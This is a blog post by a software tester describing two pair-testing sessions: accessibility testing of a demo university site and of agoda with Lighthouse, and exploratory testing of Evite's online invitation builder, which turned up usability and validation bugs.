Alex? Now, this Alex is not the Alex I already paired with. This Alex is Alex de los Reyes, whom I met in person at CAST 2018. He had listened to my talk "Cross-team Pair Testing: Lessons of a Testing Traveler" and therefore learned about my testing tour. And was intrigued! Inspired from the moment, he agreed to pair test with Amit Wertheimer.
But how to get started? Alex and I had a call where I explained in more detail how I found partners to test with, how I prepare sessions, how to run them and how to follow-up.
Even before we had this first call, Alex scheduled a pair testing session with me. Since then I was looking forward to this one and it turned out to be awesome!

Testing for Accessibility: Why, What, How

As with most partners, we had several topics to pair on in mind. In the end we decided to go for accessibility as we both wanted to get better in this area and for Alex it's becoming really relevant in his current project. Best time to practice together!

In the beginning of our session we decided to first try our skills on a practice application and afterwards tackle a real productive website to apply what we learned. The selected demo we chose was Accessible University 3.0.
"Accessible University (AU) is a fictional university home page designed to demonstrate a variety of common web design problems that result in visitors with disabilities being unable to access content or features. [...] Use the AU site to
  1. demonstrate common web accessibility principles at trainings, presentations, and workshops on accessible web design.
  2. learn common web accessibility problems and solutions in an easy-to-understand way." (Accessible University 3.0)
The demo offers an inaccessible site where you can detect at least 18 accessibility issues, a list of all issues including detailed explanations and the accessible version of the site having all issues fixed.

What can I say? We had a blast while discussing our experiences, sharing our accessibility knowledge and finding issue over issue! First, we looked for quick wins using our eyes (we're biased beings), things that instantly stood out that we knew could cause trouble for people who have to rely on a different access to technology. Second, we inspected the page structure and found even more issues using the experience and knowledge we had. And third, we used tooling to discover further issues and get inspired to explore more. Alex does not like the WAVE Chrome extension too much and rather prefers Axe. However, for this session we decided to go for another option, letting me get to know another feature of the wonderfully useful Chrome DevTools: Lighthouse, allowing you to run audits for accessibility. The report provided an overall score, automatically detected issues and their instances, as well as a useful checklist of what to explore for as it could not be detected manually. Super easy, fast and really worth it.

As I can really recommend to try this demo app on your own, I won't list our findings directly here in this blog post. If you'd like to compare your results with ours then check out our mind map of potential issues. In the end, we compared them with the provided list of 18 accessibility issues and found that we had identified a lot of them! At the same time, we learned about many more problems we had not been aware of at all before and solutions we even didn't know existed. Awesome!

Having still 15 minutes to go, we decided to follow our original plan and tackle a productive site as well. We selected agoda, a travel booking platform. Having only a very limited time box, we decided to instantly use Lighthouse and discovered the page's score was not much higher than the one of the inaccessible practice app. This way we found so many issues very quickly already. We also stumbled across other usability issues like changing navigation or not responsive design. Last but not least we tried to tab through the homepage which offered a navigation menu and a form to book a hotel room - and here's what happened. Just try it yourself!
  • For the first few tabs we saw where we were as navigation menu elements showed a blue highlighting frame.
  • The next few tabs suddenly did not show anymore any focus, so we got lost.
  • The next tab opened the calendar for the arrival date at the hotel - strange, as we had skipped the first form element to enter a destination.
  • We tabbed to the second calendar for the departure date, tabbed again and landed in a sort of drop-down / dialog / sub-form / whatever element to provide the number of rooms, adults and children.
  • We tabbed on. And found ourselves trapped in this very UI element! We could neither tab forward nor backward.
When reproducing the issue for this blog, I tried to see whether we really skipped the destination field, trying to tab backwards from the calendars - and noticed Shift+Tab did not allow me to tab backwards but had the same effect as Tab itself, both tabbing forward! I'm speechless.

Looking Back

As for each pairing session, we took some time in the end to reflect on what we learned and share our thoughts. First of all: The demo app was a really valuable target to explore, it raised awareness of the multiple traps to fall into when it comes to accessibility. Interestingly, we noticed we didn't even look at the accessible version of the page to see an example how to do it well! This is definitely still worth looking into. In any case, we both loved our approach of first practicing with the demo app, getting our brains prepared, and then switching to a productive application, being instantly able to spot issues there with the knowledge gained. We identified a lot within only 15 minutes - time worth spent.

It turned out again that bad accessibility design is often also bad user experience for everyone. Designing accessible sites improves the experience for everyone else as well. However, accessibility has to be considered already during design. Nowadays there are so many tools to support us, like checking for sufficient color contrast already in mockups.

Talking about our collaboration, it was once again a very easy session for both of us. We had agreed to use strong-style pairing and a mob timer to frequently switch roles. Alex also had made some experience with this approach already and felt comfortable with it. Our flow was very natural. Especially one fact caught our eye: we followed up on each other's ideas, using the "yes, and ..." rule from improvisational theater. Alex had already noticed that ignoring this is a common problem when pairing. In all the sessions I did on my testing tour, I found this to be one of the most important key points to pair successfully with strangers, being productive from the first minute on.

The session was thoughtful. It was super productive. It was so relevant for Alex' current project, where accessibility is a big part of the testing strategy. And the session was fun! Like several others before him, also Alex advised to "do it with someone else" as this makes it so much easier. "Don't test alone, for your own safety." I have nothing to add.

Monday, October 1, 2018

Testing Tour Stop #20: Pair Exploring Online Invitations with Claire

Pair testing with Claire Reckless was the next stop on my testing tour. We knew each other only from Twitter and Slack, have never talked or even met in person. Still, when I saw the scheduling notice, I knew this was going to be great. And it was!

The Goal: Explore

Claire did not aim to focus on a specific topic. She shared that she recently moved into a test lead role where she's not quite so hands on so it would be great to have a testing session where we could focus on doing some actual testing. She was happy to pair with me and see what happens.

Being for longer on this testing tour already with several session done, I now have a whole list of potential test targets ready to be tackled. For our session, I selected a sub-set of 5 applications that might fit our general exploration goal. At the beginning of our session, Claire decided to go for Evite, an online invitation service we both did not know.

We had already agreed in advance to pair in the strong-style way. Claire was familiar with this approach, so I simply shared screen control and explained shortly the mob timer that I prefer to use when pairing with new people. We set the timer to 4 minutes and off we went.

Stumbling and Frowning

Throughout our session, we stumbled on several issues, frowned on even more and documented all note-worthy points in a mind map. Here's what we found.
  • We started off on the Evite homepage, wondering whether we needed to register to create an invitation or how far we could come without signing up.
  • Right in the beginning, as first navigator, Claire asked me to open the browser's DevTools. When scrolling through the homepage, having a look around what this online service offered, we viewed several tabs highlighting the platform's features. When hovering over one them, showing you can handcraft invitations, we noticed in the DevTools that errors got thrown. An image was not found and a video not loaded.
  • As we had the DevTools opened and docked to the right side of the screen, its width got reduced. We noticed that this resulted in having the top navigation menu displayed as menu bottom on the top left. When opening it, we found a completely differently looking menu with differently ordered items. This felt strange and definitely not consistent.
  • We decided to search for invitation designs, using not the usual suspects that got offered but something different. We searched for "life role-playing" which gave us 0 search results back. We got suggestions to design our own invitation as well as several design proposals to start from, however, we missed what we knew from other applications to give us suggestions based on the search (like Google or Amazon does, for example). We noted it down as feature idea.
  • Going through the suggested invitation designs, we noticed that some of them had been replaced by advertisements instead, looking a lot like the other invitation designs. We did not like that at all, being a dark pattern tricking the user into clicking on these advertisements.
  • We browsed the offered categories, choosing "Birthday for Kids". The suggested designs seemed to be indeed filtered by category, and everything looked like a new search, our previous search term not maintained. We decided to use more filters and selected to see only free designs. Doing so, the result page told us that no templates matched our search although we had seen free templates for the category before. We realized the reason was that it indeed had maintained the former "life role-playing" search!
  • We removed our custom search term and then tried out further filters, like for color or animations. When filtering for themes, we noticed sometimes strange gaps in the search result grid, leading to an inconsistent layout.
  • We viewed the details of an invitation template. It showed the selected design on top, with navigation arrows on both sides. Browsing through designs this way, we found designs that had not been in our previous search result. Later I saw the tool-tip indeed says "Previous Design in Category", still, this felt not intuitive.
  • We chose to have a deeper look into the invitation template itself. We found that the design on top displayed placeholders for information we could fill in a form below. We instantly thought of security testing, if that would be our product to test.
  • The template offered a preview button, so we decided to use it to see how the invitation would look like. As we still had the DevTools opened, we saw that validation errors had been thrown. Only by scrolling down further we now also saw fields marked as required - not instantly obvious for users.
  • The required fields of the form were title, host and date/time. We filled title and host and decided to add a co-host. Interestingly, the co-host showed not only a name field but also an email address. Strange. We decided to leave the email out for now. Date and time were two different fields; we went for only providing a date. Trying to preview now, we got once again validation errors. The co-host email was required which was not obvious before, and the time as well. Well then, we added a time and any value in the email address field, having the validation errors vanish. Preview again failed due to the invalid email address. Okay, provided a valid email format.
  • We had selected an invitation template including a photo. It offered a default picture, but required us to upload a custom one before previewing. The validation message said "Please upload a photo first by tapping on the camera" - but which camera? Having scrolled down, viewing the form, it was not clear what was needed to do. Scrolling up, we saw a camera icon next to the photo.
  • Clicking on the photo asked us to choose a file from our file system, with a file extension filter on image files. We decided to view all file types instead and selected a pdf file to see what happened. A transparent overlay appeared on the whole screen, nothing else to indicate the user what went wrong. Again, as we had the DevTools opened, we saw what had happened. A JavaScript error informed us that they could not cope with the provided input. Clicking anywhere else on the page threw another error as the not-existing dialog could not be closed. We even had us thrown to a blank page when clicking on the zoom levels offered for the non-existing image. All this made us worry. If the application allowed unwanted file types and then could not cope with them this was a security issue. Selecting such a file type can happen by mistake, but also with malicious intent.
  • Back to the start. Choosing a template, filling out required fields, uploading an actual image this time. Clicked somewhere else on the page by mistake - and saw we lost our photo. The upload did not actually upload the photo yet.
  • We learned we had to confirm the upload by pressing a "Done" button which saved the image. However, hovering over our uploaded photo, the tool-tip still showed "No file chosen".
  • We noticed the upload photo button had changed into an edit button. Clicking it, a dialog was opened, titled "Custom Image". Hm, we couldn't select any standard image, so why custom? Also, the question asked whether we'd like to "modify" our image or upload a new one; the related button was labeled "Edit", however. Inconsistent.
  • We chose to edit our photo, noticing it shortly displayed the previous photo before our custom image which felt strange. We could zoom it, we could rotate it - in 45° angles! We would have expected 90° as in other applications, however, it made sense to us that more angles are offered for customizing invitations. We could drag and drop the image to a new position. Editing the photo again, we noticed the edit mode had discarded our selected zoom level, showing the image again in original size. Not nice.
  • Now, having fulfilled all prerequisites, we were ready to try the preview. Pressing the button opened a dialog telling us we could now preview the invitation - this came as a surprise to us! There was no loading bar or any other signal that would justify a separate dialog instead of simply loading the preview.
  • The preview was opened in a new tab, informing us on the tab that we're viewing a preview. The page was displayed as read-only, we could not interact with it. Strangely, the entered co-host was not displayed anywhere.
  • We decided to add more information and see what gets displayed on preview. The message from host was displayed. The created poll did not. Strange, as we would have expected to see a preview of the actual invitation including all information.
  • We found that the preview tab could not simply be reloaded, another preview had to be requested, getting a different URL.
  • We created a what to bring list; and found the field validation there to simply be incorrect. Filling only items to bring without quantity would validate the name field of the first item to bring, telling us to "Please fill out at least one field" - which we clearly had done. We added the quantity for the first item, left it empty for the other items, and the list got created successfully; only including the first item.
  • We found we could still change designs and our details got maintained. Phew. We decided to save the draft by clicking the related button, and got referred to a sign in page. The offered Google login button was framed by a red border, making it look like one of the field validation errors that we had received before.
  • Well, we did not want to register, but there was no option to cancel or return to the previous screen. So we used the browser back button - and found ourselves back at the selected template, but with all our previously added information lost!
This was a perfect point to end our session, exactly meeting our time box.

Focused, Fun, Fruitful

Claire shared that she enjoyed the session. It got her tester brain going again! She's doing lots of management these days so this was refreshing and welcome to her. She felt that the session was really productive, too. We found lots of things on all kind of levels, functionality, usability, even security. And time flew so fast! Using the mob timer set to 4 minutes, she was often surprised how fast these 4 minutes passed. She said this kept us focused, switching our roles frequently helped a lot. Also, we didn't go down too many rabbit holes and stayed on track.

From my point of view, it was very easy to collaborate with Claire. We knew each other only vaguely from online, we haven't even met yet, but I felt we spoke the same language. We did not have to explain what we meant, we had a shared basis and could instantly test together. It was fun! Another interesting point for me was that Claire was the first of my pair testing partners to ask me to open the DevTools from the very start. I really loved that fact as this is exactly what I do when testing on my own. When pairing, I try not to impose myself too much and see how others tackle testing problems. This time it was refreshing for me to see her having the same approach. And these tools let us discover so many things already, not even diving deep, simply by having the console and network tabs open.

Reflecting on what kind of issues we found testing for 75 minutes only, considering that this is a productive application, I really wonder how the people developing it approach testing and quality. I don't mean to assume bad intention, I am not the one to judge their circumstances and challenges. Seeing an application like this just makes me very curious. When we find so many clear issues on the surface, not even deeply knowing the application or testing further regarding security or accessibility or anything else, it really makes me wonder what else is there to find.

All in all, our session was again enlightening, we practiced our testing and collaboration skills, exchanged ideas and approaches. It was great. And the best thing: We will meet each other in real life quite soon at Agile Testing Days 2018 as both Claire and I are speaking there!